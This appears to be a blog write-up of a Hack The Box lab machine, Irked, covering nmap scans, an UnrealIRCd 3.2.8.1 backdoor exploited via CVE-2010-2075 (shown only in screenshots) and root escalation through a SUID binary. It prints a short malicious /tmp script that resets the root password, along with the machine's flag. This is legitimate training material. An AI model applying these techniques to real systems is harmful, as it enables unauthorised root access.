{"id":118,"date":"2024-11-13T09:25:39","date_gmt":"2024-11-13T01:25:39","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=118"},"modified":"2024-11-13T09:50:07","modified_gmt":"2024-11-13T01:50:07","slug":"htb_machine_irked","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_irked\/","title":{"rendered":"HTB Machine Irked Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code>10.10.10.117<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/irked\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.117\nPING 10.10.10.117 (10.10.10.117) 56(84) bytes of data.\n64 bytes from 10.10.10.117: icmp_seq=1 ttl=63 time=269 ms\n64 bytes from 10.10.10.117: icmp_seq=2 ttl=63 time=268 ms\n64 bytes from 10.10.10.117: icmp_seq=3 ttl=63 time=268 ms\n64 bytes from 10.10.10.117: icmp_seq=4 ttl=63 time=269 ms\n\n--- 10.10.10.117 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3071ms\nrtt min\/avg\/max\/mdev = 268.217\/268.556\/269.083\/0.346 ms<\/code><\/pre>\n<p>Connectivity between the attacking machine and the target is good.<\/p>\n<h2>Firewall Detection<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:30:38 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\nNot shown: 65528 closed tcp ports (reset)\nPORT      STATE         SERVICE\n22\/tcp    open|filtered ssh\n80\/tcp    open|filtered http\n111\/tcp   open|filtered rpcbind\n6697\/tcp  open|filtered ircs-u\n8067\/tcp  open|filtered infi-async\n44349\/tcp open|filtered unknown\n65534\/tcp 
open|filtered unknown\n\n# Nmap done at Fri Jul 12 08:31:14 2024 -- 1 IP address (1 host up) scanned in 36.06 seconds<\/code><\/pre>\n<p>The target has <code>7<\/code> <code>TCP<\/code> ports open.<\/p>\n<h2>Network Port Scanning<\/h2>\n<p><code>TCP<\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:33:57 2024 as: nmap -sS -sV -A -p 22,80,111,6697,8067,44349,65534 -oN .\/tcp_result.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\n\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)\n| ssh-hostkey: \n|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)\n|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)\n|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)\n|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)\n80\/tcp    open  http    Apache httpd 2.4.10 ((Debian))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.4.10 (Debian)\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          44349\/tcp   status\n|   100024  1          46842\/tcp6  status\n|   100024  1          53849\/udp   status\n|_  100024  1          60642\/udp6  status\n6697\/tcp  open  irc     UnrealIRCd\n8067\/tcp  open  irc     UnrealIRCd\n44349\/tcp open  status  1 (RPC #100024)\n65534\/tcp open  irc     UnrealIRCd\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.18 (96%), Linux 3.2 - 4.9 (96%), Linux 
3.8 - 3.11 (96%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   363.31 ms 10.10.14.1 (10.10.14.1)\n2   363.45 ms irked.htb (10.10.10.117)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 12 08:34:35 2024 -- 1 IP address (1 host up) scanned in 37.88 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:36:10 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.117\nWarning: 10.10.10.117 giving up on port because retransmission cap hit (10).\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\nNot shown: 65167 open|filtered udp ports (no-response), 365 closed udp ports (port-unreach)\nPORT      STATE SERVICE\n111\/udp   open  rpcbind\n5353\/udp  open  zeroconf\n53849\/udp open  unknown\n\n# Nmap done at Fri Jul 12 08:42:14 2024 -- 1 IP address (1 host up) scanned in 364.26 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> port detail scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:43:55 2024 as: nmap -sU -sV -A -p 111,5353,53849 -oN .\/udp_report.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\n\nPORT      STATE SERVICE VERSION\n111\/udp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   
100024  1          44349\/tcp   status\n|   100024  1          46842\/tcp6  status\n|   100024  1          53849\/udp   status\n|_  100024  1          60642\/udp6  status\n5353\/udp  open  mdns    DNS-based service discovery\n| dns-service-discovery: \n|   9\/tcp workstation\n|     Address=10.10.10.117 dead:beef::250:56ff:fe94:f197\n|   80\/tcp http\n|_    Address=10.10.10.117 dead:beef::250:56ff:fe94:f197\n53849\/udp open  status  1 (RPC #100024)\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 2 hops\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   361.20 ms 10.10.14.1 (10.10.14.1)\n2   361.38 ms irked.htb (10.10.10.117)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 12 08:44:07 2024 -- 1 IP address (1 host up) scanned in 12.04 seconds<\/code><\/pre>\n<p>The scans also show that the target's operating system is <code>Debian Linux<\/code>, with a kernel version of roughly <code>Linux 3.12<\/code>.<\/p>\n<hr \/>\n<h1>Service Probing<\/h1>\n<h2>SSH Service (Port 22)<\/h2>\n<p>Port <code>Banner<\/code>:<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/irked]\n\u2514\u2500# nc -nv 10.10.10.117 22                                             \n(UNKNOWN) [10.10.10.117] 22 (ssh) open\nSSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4<\/code><\/pre>\n<h2>IRC Chat Service<\/h2>\n<p>Scanning with <code>Nmap<\/code> gave the following results:<\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jul 12 08:52:46 2024 as: nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697,8067,65534 -oN .\/irc_scan_report.txt 10.10.10.117\nNmap scan report for irked.htb (10.10.10.117)\nHost is up (0.36s latency).\n\nPORT      
STATE SERVICE VERSION\n6697\/tcp  open  irc     UnrealIRCd (Admin email djmardov@irked.htb)\n| irc-botnet-channels: \n|_  ERROR: Closing Link: [10.10.14.2] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.\n8067\/tcp  open  irc     UnrealIRCd (Admin email djmardov@irked.htb)\n| irc-botnet-channels: \n|_  ERROR: Closing Link: [10.10.14.2] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.\n65534\/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)\n| irc-botnet-channels: \n|_  ERROR: Closing Link: [10.10.14.2] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 12 08:52:48 2024 -- 1 IP address (1 host up) scanned in 2.49 seconds<\/code><\/pre>\n<p>This revealed the domain name <code>irked.htb<\/code> and a suspected administrator username, <code>djmardov<\/code>.<\/p>\n<p>Tried logging in to the <code>IRC<\/code> chat server with the username <code>djmardov<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720746480177-d95cad4d-5fdf-47f8-8768-0f78adcdd001.png\" alt=\"\" \/><\/p>\n<p>This showed that the chat server version is <code>UnrealIRCd v3.2.8.1<\/code>, which has <code>2<\/code> command execution vulnerabilities.<\/p>\n<hr \/>\n<h1>Penetration Testing<\/h1>\n<p>Attempted an attack using the <code>CVE-2010-2075<\/code> vulnerability and successfully received a reverse shell:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720747661351-75546923-8127-4f6e-b359-3e4a753e5259.png\" alt=\"\" \/><\/p>\n<hr 
\/>\n<h1>Privilege Escalation<\/h1>\n<h2>Suspected Password File Collection<\/h2>\n<p>A suspected password backup file, <code>.backup<\/code>, was found in the <code>\/home\/djmardov\/Documents<\/code> directory, with the following contents:<\/p>\n<pre><code class=\"language-plain\">Super elite steg backup pw\nUPupDOWNdownLRlrBAbaSSss<\/code><\/pre>\n<h2>Local Information Gathering<\/h2>\n<p><strong>Basic system information<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749872931-660cb743-6b2f-4345-be14-69f6260d992f.png\" alt=\"\" \/><\/p>\n<p><strong>Process list<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749879561-e5a97758-5f12-44e2-8935-16cee67780f8.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749884493-5550d1c1-9b26-4b3f-af4a-ecbdf5f2b3f9.png\" alt=\"\" \/><\/p>\n<p><strong>Scheduled task list<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749891627-18b21595-c04f-4376-b13b-275832360907.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749895979-6514e77c-d826-4e33-b2c0-cb441b900081.png\" alt=\"\" \/><\/p>\n<p><strong>Environment variables<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749901981-7462008c-bfcd-4b01-aed8-99f1e02cc4e0.png\" alt=\"\" \/><\/p>\n<p><strong>User information<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749909790-47949c23-589f-44f9-abe7-7b599b2f9047.png\" alt=\"\" \/><\/p>\n<p><strong>User home directories<\/strong><\/p>\n<p><img decoding=\"async\" 
src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749941308-9cf791c5-9c6b-4c37-8c30-8cce744f3ae2.png\" alt=\"\" \/><\/p>\n<p><strong>Files with special permissions<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749948771-b579d005-b5aa-4fe8-b49c-289cf744e232.png\" alt=\"\" \/><\/p>\n<p><strong>Open port information<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749963546-3b0ca7bd-1223-4f08-8fd1-73cd331e66c9.png\" alt=\"\" \/><\/p>\n<p><strong>Sensitive file permissions<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720749971068-3f1bf84f-c8e9-461d-956a-a96aa4ea01e9.png\" alt=\"\" \/><\/p>\n<p>Analysis showed that an unfamiliar program, <code>\/usr\/bin\/viewuser<\/code>, has the <code>SUID<\/code> bit set, is owned by <code>root<\/code>, and has permissions <code>4755<\/code>, so this program was chosen as the entry point for privilege escalation.<\/p>\n<h2>Privilege Escalation via the SUID Program<\/h2>\n<p>Downloaded the <code>\/usr\/bin\/viewuser<\/code> program to the local machine and used <code>IDA Pro<\/code> to generate pseudocode:<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  puts(\"This application is being devleoped to set and test user permissions\");\n  puts(\"It is still being actively developed\");\n  system(\"who\");\n  setuid(0);\n  system(\"\/tmp\/listusers\");\n  return 
0;\n}<\/code><\/pre>\n<p>The program first prints some text, then runs the <code>who<\/code> command, then sets the process <code>UID<\/code> to <code>0<\/code>, and then runs the script <code>\/tmp\/listusers<\/code>, which does not exist. Because <code>\/tmp<\/code> is world-writable, any local user can create that file and have it run as <code>root<\/code>.<\/p>\n<p>Create the malicious script <code>\/tmp\/listusers<\/code> directly:<\/p>\n<pre><code class=\"language-bash\">#! \/bin\/bash\npasswd root<\/code><\/pre>\n<p>Then run the <code>viewuser<\/code> command to change the <code>root<\/code> password:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1720751890035-30da3f3a-0ec8-4f8f-ae1d-ebbdc4f54f7c.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation succeeded!!!!<\/strong><\/p>\n<hr \/>\n<h1>Flag File<\/h1>\n<pre><code class=\"language-plain\">a7ba3d1a40dfdf8455abdd3325f59ccf<\/code><\/pre>\n<hr \/>\n<h1>This concludes the penetration test of this machine<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.10.10.117 Information Gathering ICMP Check \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026 
&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-118","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=118"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/118\/revisions"}],"predecessor-version":[{"id":119,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/118\/revisions\/119"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}